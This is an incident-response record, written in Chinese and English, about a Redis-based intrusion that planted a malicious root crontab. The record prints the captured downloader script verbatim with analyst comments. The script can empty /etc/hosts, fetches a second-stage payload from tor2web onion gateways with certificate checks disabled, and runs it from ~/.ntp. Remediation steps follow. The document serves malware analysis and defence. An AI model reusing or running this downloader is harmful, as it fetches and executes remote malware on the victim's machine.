位置: /var/spool/cron/root
侵入方式: Redis 漏洞（落地位置为 /var/spool/cron/root，与 Redis 未授权访问直接写入 root crontab 的手法相符，具体入口待确认）
Shell 脚本（crontab 中投递的原始恶意脚本，原样保留供分析，勿执行）
# Captured malware sample (root crontab payload) — kept byte-for-byte for analysis; do not run.
# The subshell locates a download tool, tampers with /etc/hosts and fetches a second stage
# into ~/.ntp; the stage is executed only if the subshell exits 0.
(
# The directory holding `passwd` is later used as a search path for a renamed downloader.
tbin=$(command -v passwd)
bpath=$(dirname "${tbin}")
curl="curl"
# No usable curl on PATH (no line containing "curl " in its --version output)?
if [ $(curl --version 2>/dev/null | grep "curl " | wc -l) -eq 0 ]; then
# Fall back to `echo` (does nothing but still exits 0), then scan for any binary whose
# strings contain CURLOPT_VERBOSE, i.e. a curl build living under another name.
# NOTE(review): `${bpath}*` has no trailing slash, so it globs siblings of the bin
# directory (e.g. /usr/bin itself) rather than the files inside it; the scan looks ineffective.
curl="echo"
if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null | grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi
fi
# Same probe for wget (marker string "to <bug-wget@gnu.org>"). The download line below
# invokes the literal `wget`, not `${wget}`, so this variable is computed but never used.
wget="wget"
if [ $(wget --version 2>/dev/null | grep "wgetrc " | wc -l) -eq 0 ]; then
wget="echo"
if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null | grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi
fi
# If /etc/hosts matches the pattern ".onion." (presumably entries left by a competing
# infection), rewrite it. Two stdout redirections are given: /etc/hosts is opened and
# truncated first, then stdout is moved to /dev/null, so the text never lands in the file.
# Net effect on a hit is an EMPTY /etc/hosts — a useful indicator during triage.
if [ $(cat /etc/hosts | grep -i ".onion." | wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" >/etc/hosts >/dev/null 2>&1; fi
# Fetch the second stage "ldm3" through two tor2web gateways (.su, .io), up to six attempts,
# TLS verification disabled (-k / --no-check-certificate), 40 s timeout, saved to ~/.ntp
# (/root/.ntp when run from root's crontab). The || chain stops at the first command that
# exits 0, so if curl fell back to `echo` the chain "succeeds" without writing ~/.ntp.
${curl} -fsSLk --max-time 40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -o ~/.ntp || ${curl} -fsSLk --max-time 40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -o ~/.ntp || ${curl} -fsSLk --max-time 40 https://xyxg3xqckmqy2wbp.tor2web.io/src/ldm3 -o ~/.ntp || wget --quiet --no-check-certificate --timeout=40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -O ~/.ntp || wget --quiet --no-check-certificate --timeout=40 https://xyxg3xqckmqy2wbp.tor2web.su/src/ldm3 -O ~/.ntp || wget --quiet --no-check-certificate --timeout=40 https://xyxg3xqckmqy2wbp.tor2web.io/src/ldm3 -O ~/.ntp
# Only when the subshell exited 0: mark the dropped file executable and run it with sh.
) && chmod +x ~/.ntp && sh ~/.ntp
处理方式:
1、已关闭常用对外暴露端口（作为入口的 Redis 服务端口不应再对外暴露，或至少启用认证并绑定内网地址）
2、已对相关来源做黑名单与访问限制处理（应覆盖脚本中的下载源 tor2web.su / tor2web.io 及对应出站流量）
3、残留清理（原文“不可描述的遗留处理”）：至少应删除 /var/spool/cron/root 中的该条目和落地文件 ~/.ntp（root 下为 /root/.ntp），终止由 sh ~/.ntp 拉起的进程，并检查 /etc/hosts 是否已被该脚本清空并予以恢复